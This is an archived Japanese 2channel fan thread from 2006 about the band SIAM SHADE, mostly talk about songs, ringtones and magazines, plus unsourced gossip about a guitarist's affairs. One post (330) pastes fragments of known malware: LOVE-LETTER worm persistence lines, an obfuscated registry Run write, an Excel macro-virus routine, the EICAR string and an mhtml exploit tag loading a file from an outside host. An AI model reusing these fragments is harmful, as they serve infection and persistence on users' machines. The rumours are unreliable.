229 :伝説の名無しさん:2006/06/24(土) 15:27:49
生兵法は大けがのもと

230 :伝説の名無しさん:2006/06/24(土) 16:05:46
>>229
警告の最後の英文か

231 :伝説の名無しさん:2006/06/24(土) 18:06:31
シャム扱ってる着フルサイトねー!
あっても1/3とかメジャーなのばっかり…マニアックなのを聞きたいのに

232 :伝説の名無しさん:2006/06/24(土) 18:09:03
Why not? PRIDE等を作ったKAZUMAは偉大。

233 :伝説の名無しさん:2006/06/24(土) 18:30:23
Dear...はチャックが音楽を辞めようか悩んでいた時にFAN送ったSONG

234 :伝説の名無しさん:2006/06/24(土) 18:36:09
警告
http://www.na.sakura.ne.jp/~time/buromai/zu/zuPg02.htm

235 :伝説の名無しさん:2006/06/24(土) 21:38:58
>>233へぇ〜

236 :伝説の名無しさん:2006/06/24(土) 22:51:23
DAITAって気持ち悪いぐらい写真がナルシストだよな

237 :伝説の名無しさん:2006/06/25(日) 12:14:59
>>236かっこよくないのにね

238 :伝説の名無しさん:2006/06/25(日) 15:50:41
>>236
>>237

ナルシストなとこがカッコイイんだよ

239 :伝説の名無しさん:2006/06/25(日) 16:11:39
>>238がいい事言った

240 :伝説の名無しさん:2006/06/25(日) 17:48:21
>>233
それ、if〜ひとりごと〜じゃねぇの??

241 :伝説の名無しさん:2006/06/25(日) 17:59:43
>>240
お前何もわかってないなw
SHAMの記事やインタ載ってるもの片っ端から確認してから出直しておいでw

242 :伝説の名無しさん:2006/06/25(日) 18:15:06
>>240

俺は>>233だけど、まぁ…その記事貼っておくよ。
http://s.pic.to/w2f2

243 :240:2006/06/25(日) 18:24:27
ああ、スマソ
知ったかしてたorz

でもif〜の歌詞もそんな感じじゃなかった?

244 :伝説の名無しさん:2006/06/25(日) 18:33:11
>>243
確かに。
でもIfの由来とか聞いた事ないなぁ。
誰のひとりごとなんだかw

245 :伝説の名無しさん:2006/06/25(日) 18:46:12
今バスなんだけど、横に座ってる奴が1/3聴きながら足でリズムとってるw

246 :伝説の名無しさん:2006/06/25(日) 18:55:04
よしっ、隣でハモれ!

247 :伝説の名無しさん:2006/06/25(日) 20:04:37
隣でナッチンの真似しろ!

248 :伝説の名無しさん:2006/06/25(日) 20:13:42
>>247
一馬じゃなくて?

249 :伝説の名無しさん:2006/06/25(日) 22:39:55
隣でtactics歌って反応したらそいつはアニオタ

250 :伝説の名無しさん:2006/06/25(日) 23:18:10
ダイタてぽっちゃりしてるよな?

251 :伝説の名無しさん:2006/06/25(日) 23:55:22
二の腕がぷにぷにだよね

252 :伝説の名無しさん:2006/06/26(月) 06:44:00
腹は?

253 :伝説の名無しさん:2006/06/26(月) 12:51:26
>>245Lifeを電車で聞いてるのは自分だから声かけてくれ

254 :伝説の名無しさん:2006/06/26(月) 12:59:23
この前、世界平和Tシャツ着て、SIAMのツアーグッズのバック持ってる兄ちゃんを見た。あーゆーのを街で目撃すると何だか嬉しいww

255 :伝説の名無しさん:2006/06/26(月) 16:56:23
金髪 上半身裸

256 :伝説の名無しさん:2006/06/26(月) 22:02:31
>>255おまいさんが?

257 :伝説の名無しさん:2006/06/27(火) 03:02:28
ダイタってヤリチン男なんだろ

258 :216:2006/06/27(火) 12:51:07
>>257
ヤリチンだったら?
別にどうでもよくね?
1人の女としかセックスしない男が良い男って視野狭過ぎだよあんた。
音楽やアイデンティティに共感してんじゃないの?
「ヤリチン」だったらだめって時代じゃないよ今は。
だって、それでも良いから相手の女だってセックスしてんだからさ。



259 :伝説の名無しさん:2006/06/27(火) 18:19:43
>>255
男樹に映ってましたね?

260 :伝説の名無しさん:2006/06/27(火) 18:52:03
>>255ラスト武道館にもいる

261 :伝説の名無しさん:2006/06/27(火) 19:00:27
ちょww

262 :伝説の名無しさん:2006/06/27(火) 20:04:30
3の時のDAITAの髪は神

263 :伝説の名無しさん:2006/06/27(火) 22:19:26
Vの歌詞カードの大太がキムタクに見えてしまう

264 :伝説の名無しさん:2006/06/28(水) 02:38:17
最近デブタクだろw


265 :伝説の名無しさん:2006/06/28(水) 02:54:30
>>258
おまえ最低過ぎ

266 :216:2006/06/28(水) 07:50:44
>>265
ちいせぇやつだなぁ
セックスってお前の中でドンくらいの重要度なのか知りたい
人生にそれ以上のめり込めるもんが無いんだな
かわいそうに

267 :伝説の名無しさん:2006/06/28(水) 17:08:59
まあまあ
いいじゃないかどっちでも
大切なのはハートだよ つ旦~~

268 :伝説の名無しさん:2006/06/28(水) 17:57:35
自分を本気で愛してくれた女を傷つける男は
ろくな人間じゃないのは確かだがな

269 :伝説の名無しさん:2006/06/28(水) 18:11:36
自分じゃない女とセックスしたくらいで冷めるような器の小さい女は
愛されないわな

芸能人の知り合い多いが旦那の自分以外の恋人の存在を許してる人が奥さんなケースが多いよ

270 :伝説の名無しさん:2006/06/28(水) 20:41:20
セックスで熱くなってるヤシがいるな。よそでやってくれ。
ギターも夜のプレイも最高って事で桶。

271 :伝説の名無しさん:2006/06/28(水) 21:49:01
DAITAの誕生日は太宰治と同じだ
おもいきって愛人と心中でもしてくれたら男樹を感じるよな!

272 :伝説の名無しさん:2006/06/29(木) 19:04:17
ナッチンて伊藤かずえと結婚してたんだな。今更だけど初めて知ったよ

273 :伝説の名無しさん:2006/06/29(木) 19:06:23
あれ?ダイタだと勘違いしてた

274 :伝説の名無しさん:2006/06/29(木) 19:43:14
>>272
ミリオネア見てんなよw

275 :伝説の名無しさん:2006/06/29(木) 19:59:07
>274 いや見るつもりはなかったんだが、見たことあるヤツだと思ったらナッチンだったw てか、何でミリオネアのこと知ってんだよww

276 :伝説の名無しさん:2006/06/29(木) 20:13:27
>>274も見てるからww 同類ww

277 :274:2006/06/29(木) 21:13:21
俺もたまたま見たんだよw

278 :伝説の名無しさん:2006/06/29(木) 21:58:02
みんな見てんだね
自分もだけど

279 :伝説の名無しさん:2006/06/29(木) 23:23:35
某スレ見たがダイタ最悪だな,,,


280 :伝説の名無しさん:2006/06/29(木) 23:50:16
だいたって奥さんいたっけ?

281 :伝説の名無しさん:2006/06/30(金) 01:14:51
なんでなっちんが応援ででないんだ?
金山夫妻って・・・
テレホンくらい出ればいいのに。

282 :伝説の名無しさん:2006/06/30(金) 03:14:05
ダイタは子供3人居るよ
上がすでに8歳

283 :伝説の名無しさん:2006/06/30(金) 21:14:51
すでに有名な話だ
氷室自身もDAITAの子供について話していたしな〜

284 :伝説の名無しさん:2006/06/30(金) 21:28:13
嫁さんは有名人じゃないんだ

285 :伝説の名無しさん:2006/06/30(金) 21:48:51
元は音楽番組のアシスタントでシャムがゲストに呼ばれた時に
Dに告って付き合い始めたと聞いた

その後Dが浮気を繰り返し別れ話も出たそうだけど
ある日子供が出来ちゃったってんで今にいたるそうだ

嫁さんの見た目は普通のおばさんだな
だからDの不倫も止まらんのだが



286 :伝説の名無しさん:2006/07/01(土) 00:10:18
奥さんって何歳なの?

287 :伝説の名無しさん:2006/07/01(土) 22:24:07
YOUTUBEでHAKUとかかれているSIAMSHADEの歌を聴いたんですけど、あの曲はどのアルバムに入ってるんですか?大分良い曲ですよね?

288 :伝説の名無しさん:2006/07/01(土) 22:40:24
>>287
SIAM SHADEの曲じゃないよー
HIDEKIのソロだよ

289 :伝説の名無しさん:2006/07/01(土) 23:49:06
>>288
2月号売り切れなんだよね・・・。
ネット通販でまとめ買いしようと思って
発売日に買わなかったのが悪かった・・・。誰か売ってくれ。

290 :伝説の名無しさん:2006/07/02(日) 01:01:52
俺で良ければ売るけど

291 :伝説の名無しさん:2006/07/02(日) 01:12:22
ここのサイトって IP表示されてるの?
携帯だと 表示されてないけど パソだと でてるのかな?

292 :伝説の名無しさん:2006/07/02(日) 14:08:28
J-ROCKでは売り切れかもしれないが、Amazonだったら2月号も買えるんじゃないか?

293 :伝説の名無しさん:2006/07/02(日) 14:19:07
ゴメソ、Amazonも受注不可みたいだ
でも、タワレコ見たら在庫わずかで残ってたお

294 :伝説の名無しさん:2006/07/03(月) 21:49:05
1st欲しい奴いるか?

295 :伝説の名無しさん:2006/07/03(月) 22:18:51
>>290
おいくら?

296 :伝説の名無しさん:2006/07/04(火) 00:18:00
>>295 500円くらいでいいよ、ブックオフ持っていったら売れないとか言われた

297 :伝説の名無しさん:2006/07/04(火) 00:35:53
>>296
マジで?創,1月号持ってて、2月抜けてると気持ち悪いから
他のも買うのやめようかなーと思ってたんだ。

応募券捨てちゃった?

298 :伝説の名無しさん:2006/07/04(火) 00:46:49
SIAM SHADEの着うたあるサイトって全然ない…(´・ω・`)

299 :伝説の名無しさん:2006/07/04(火) 01:05:46
J研っていう投稿型のサイトにたくさんある
ただし、素人が作ってる&廃れてきてるので
音がしょぼかったり16和音だったりする

300 :伝説の名無しさん:2006/07/04(火) 01:42:05
>>298
シングルしかないよね・・・
Dearとかブラッディートレインとか欲すい(・д・`)

301 :伝説の名無しさん:2006/07/04(火) 02:15:50
>>297すまない応募券はない。

302 :伝説の名無しさん:2006/07/04(火) 02:38:18
>>300
普通にあるぞ。

303 :伝説の名無しさん:2006/07/04(火) 02:59:52
>>302
( °д °)まじで!?
何処にあるんですか?ちなみにAUです。

304 :伝説の名無しさん:2006/07/04(火) 05:59:33
ここわ?
http://m-pe.tv/u/page.php?uid=skulldandy&id=1

305 :302:2006/07/04(火) 07:33:56
>>303
そうそう。>>304のとこ。

306 :伝説の名無しさん:2006/07/04(火) 18:33:50
>>304
ありがとう(*´艸`)

307 :伝説の名無しさん:2006/07/04(火) 22:52:28
>>298です
>>299>>304
教えてくれてありがとう。
けど、登録できるmmfの着うたあるサイト探してたんだ…ワガママでごめんね(´・ω・`)

308 :伝説の名無しさん:2006/07/05(水) 20:10:41
ラストライヴの淳士モタってねぇ??

309 :伝説の名無しさん:2006/07/07(金) 21:29:52
どの曲を誰が創ったのか教えて下さい。

310 :伝説の名無しさん:2006/07/08(土) 03:49:10
時代とか〜は淳二

311 :伝説の名無しさん:2006/07/08(土) 11:39:12
309
ここで全部わかるお
http://koti.mbnet.fi/goutetsu/siamshade.shtml

312 :伝説の名無しさん:2006/07/09(日) 12:18:51
今更だけどブランコいいなw

313 :伝説の名無しさん:2006/07/09(日) 21:16:12
ブランコは歌詞が好き

314 :伝説の名無しさん:2006/07/09(日) 21:56:52
風鈴版の A型男のF事情マジかよ

315 :伝説の名無しさん:2006/07/10(月) 01:25:20
>>314

見て来た.ダイタ生々しすぎだ


316 :伝説の名無しさん:2006/07/10(月) 08:27:55
アァーーーーー!!!!!!!!
ふんがぁーーー!!!!!!!!
ウゼーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!






317 :伝説の名無しさん:2006/07/10(月) 10:50:10
>>314
風鈴版てどこ?

318 :伝説の名無しさん:2006/07/10(月) 22:22:53
V2買った

みんな若いな

319 :伝説の名無しさん:2006/07/10(月) 22:49:26
>>312
>>313
うん、ブランコいいよね。
最近1999好き。
サビじゃなくて初めのとこが好きだったりする。
私おかしいかな?

320 :伝説の名無しさん:2006/07/10(月) 23:19:02
1999をカラオケで歌う場合は、
是非とも2人で歌う事をお勧め致すw

321 :伝説の名無しさん:2006/07/11(火) 18:26:47
確かに

322 :伝説の名無しさん:2006/07/11(火) 20:57:10
クラーインベベー
クラーインベベー

さてなんて曲でしょう?

323 :伝説の名無しさん:2006/07/11(火) 21:11:12
Money is king?

324 :伝説の名無しさん:2006/07/12(水) 03:33:20
>>317
不倫版

325 :伝説の名無しさん:2006/07/12(水) 07:46:25
PRIDEのイントロって何かイヤらしいよなww

326 :伝説の名無しさん:2006/07/12(水) 22:58:24
シャムファンだったらPain of Salvation好きだよな?

327 :伝説の名無しさん:2006/07/12(水) 23:23:18
気になってるが聴けてない
何のアルバムがお薦めか教えてくれ

でもシャムファンならむしろDTじゃないか?

328 :伝説の名無しさん:2006/07/12(水) 23:33:20
>>327
http://www.progarchives.com/Progressive_rock_discography_BAND.asp?band_id=284
ここで視聴できる。DTは歌物じゃないからなぁ。PoSはインスト少ないけどリフはDT以上にかっこいいよ
ポップなのが好きならRemedy Lane,アコースティックライブの12:5
メタル好きなら1st,2nd
初めて聞くならパーフェクト・エレメントかな?
Beはホントのプログレ好きにオススメ。
ちなみに全部コンセプトアルバム
ところで未だにDTがプログレといわれてる理由が分からない


329 :伝説の名無しさん:2006/07/12(水) 23:55:04
おっぱいまーん

330 :伝説の名無しさん:2006/07/13(木) 00:08:53
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

331 :伝説の名無しさん:2006/07/13(木) 05:11:58
ひできってソロになってから何枚シングル出してんの?

332 :sage:2006/07/13(木) 15:14:08
ノートンギコナビから外してるのに開けない

333 :伝説の名無しさん:2006/07/13(木) 20:53:45
POSええなぁ。気に入った

334 :伝説の名無しさん:2006/07/15(土) 08:38:50
全員集合の意味はどうとらえますか?

siam shadeメンバー          


だったらいいなぁ

335 :伝説の名無しさん:2006/07/15(土) 09:50:33
るろ剣のDVD-BOX欲しいぜ!

336 :伝説の名無しさん:2006/07/15(土) 17:54:09
いらないぜ!!

337 :伝説の名無しさん:2006/07/16(日) 07:53:19
なんかNATINファンって少ないよな

338 :伝説の名無しさん:2006/07/16(日) 08:26:20
鼻が素敵

339 :伝説の名無しさん:2006/07/16(日) 13:20:45
SHAKE ME DOWNって名曲じゃね。

340 :伝説の名無しさん:2006/07/16(日) 13:23:24
ラップのとこ?

341 :伝説の名無しさん:2006/07/16(日) 21:59:20
はうどぅゆーらいきっ

342 :伝説の名無しさん:2006/07/16(日) 22:14:13
ラップの所誰が歌ってるん??

343 :伝説の名無しさん:2006/07/16(日) 23:50:41
ボーカル

344 :伝説の名無しさん:2006/07/20(木) 12:05:26
>>337
私の周り、結構居るよ
そんな私は淳士ファンだけど

345 :伝説の名無しさん:2006/07/20(木) 12:26:54
>>344
 僕も淳士ファンだが・・・
 いじめられる女の子に(**)

346 :伝説の名無しさん:2006/07/20(木) 19:02:04
やっぱDAITAだろう

347 :伝説の名無しさん:2006/07/21(金) 18:23:50
ラスト武道館GET A LIFE の最初のほうの歌詞で、秀喜が『ダッチワイフ』て歌ってるように聴こえるんだけどw

348 :伝説の名無しさん:2006/07/21(金) 23:36:42
>>337
まず私の周りにシャムファンが少ない

349 :伝説の名無しさん:2006/07/22(土) 10:05:31
自分の所には少ないどころかいない

350 :伝説の名無しさん:2006/07/23(日) 02:08:38
>>349
自分のところには友達がいない

351 :伝説の名無しさん:2006/07/23(日) 13:29:26
>>349自分の周りにはいない

352 :伝説の名無しさん:2006/07/23(日) 19:10:16
>>350友達になろうぜ!

353 :伝説の名無しさん:2006/07/23(日) 20:13:45
暖かい流れだな」

354 :伝説の名無しさん:2006/07/23(日) 20:32:05
みんな月刊ヒデキどうしてる?

355 :伝説の名無しさん:2006/07/23(日) 21:34:53
シャムシェ

356 :伝説の名無しさん:2006/07/24(月) 00:19:15
>>354
買ってるよ
SIAMを期待して買うとがっかりするかもしれないけど
切り離して考えれば大丈夫

357 :伝説の名無しさん:2006/07/24(月) 13:05:24
>>356聞き方間違えた
漫画はどう?って言いたかった

358 :伝説の名無しさん:2006/07/24(月) 19:29:57
>>357
さすがにそこまで行間は読めませんw

359 :伝説の名無しさん:2006/07/25(火) 02:30:57
DAITAの真髄はテクのレベルの高さもさることながら、
ギターで独特の世界観をつくりあげるところにある。
ギターが唄う、ドラマティックな世界。これに尽きる。

スーパースーパー!!

360 :伝説の名無しさん:2006/07/25(火) 19:15:49
スーパー!スーパー!

361 :伝説の名無しさん:2006/07/25(火) 20:21:45
心の中で唱え続けても現実は何も変わりはしない
勇気を出して 一歩踏み出せ 全てはそこから始まって行く
若すぎて解らなさ過ぎても それだからこそ出来る事もある
過信は確信にせまり やがて確実に現実と変えて行く

362 :伝説の名無しさん:2006/07/25(火) 20:43:59
抱いて 抱いて 抱いて 抱いて 抱いて 抱いて 抱いて 抱いて
抱いて 抱いて 抱いて 抱いて 抱いて 抱いて 抱いて 抱いて
抱いて 抱いて 抱いて 抱いて 抱いて 抱いて 抱いて 抱いて
抱いて 抱いて 抱いて 抱いて 抱いて 抱いて 抱いて 抱いて
抱いて 抱いて 抱いて 抱いて 抱いて 抱いて 抱いて 抱いて
抱いて 抱いて 抱いて 抱いて 抱いて 抱いて 抱いて 抱いて
抱いて 抱いて 抱いて 抱いて 抱いて 抱いて 抱いて 抱いて
抱いて 抱いて 抱いて 抱いて 抱いて 抱いて 抱いて 抱いて
抱いて 抱いて 抱いて 抱いて 抱いて 抱いて 抱いて 抱いて
抱いて 抱いて 抱いて 抱いて 抱いて 抱いて 抱いて 抱いて
抱いて 抱いて 抱いて 抱いて 抱いて 抱いて 抱いて 抱いて
か。

363 :伝説の名無しさん:2006/07/25(火) 23:24:37
みんなBLACK好きすぎだろw

364 :伝説の名無しさん:2006/07/26(水) 00:27:27
BLACKは音は好きだが歌詞が……。

それならAllergyだべ

365 :伝説の名無しさん:2006/07/26(水) 09:10:04
youtube

カウントダウンTVの切なさよりも遠くへ

撃()ヨス

366 :伝説の名無しさん:2006/07/26(水) 18:03:12
ギガ「」ヨス

367 :伝説の名無しさん:2006/07/26(水) 21:06:06
ぎがかぎかっこよす?

368 :伝説の名無しさん:2006/07/26(水) 21:27:43
>>367

せ い か い

369 :伝説の名無しさん:2006/07/27(木) 12:37:34
ブラックは『泣いてなんかないで〜』の辺りが堪らんな

55 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)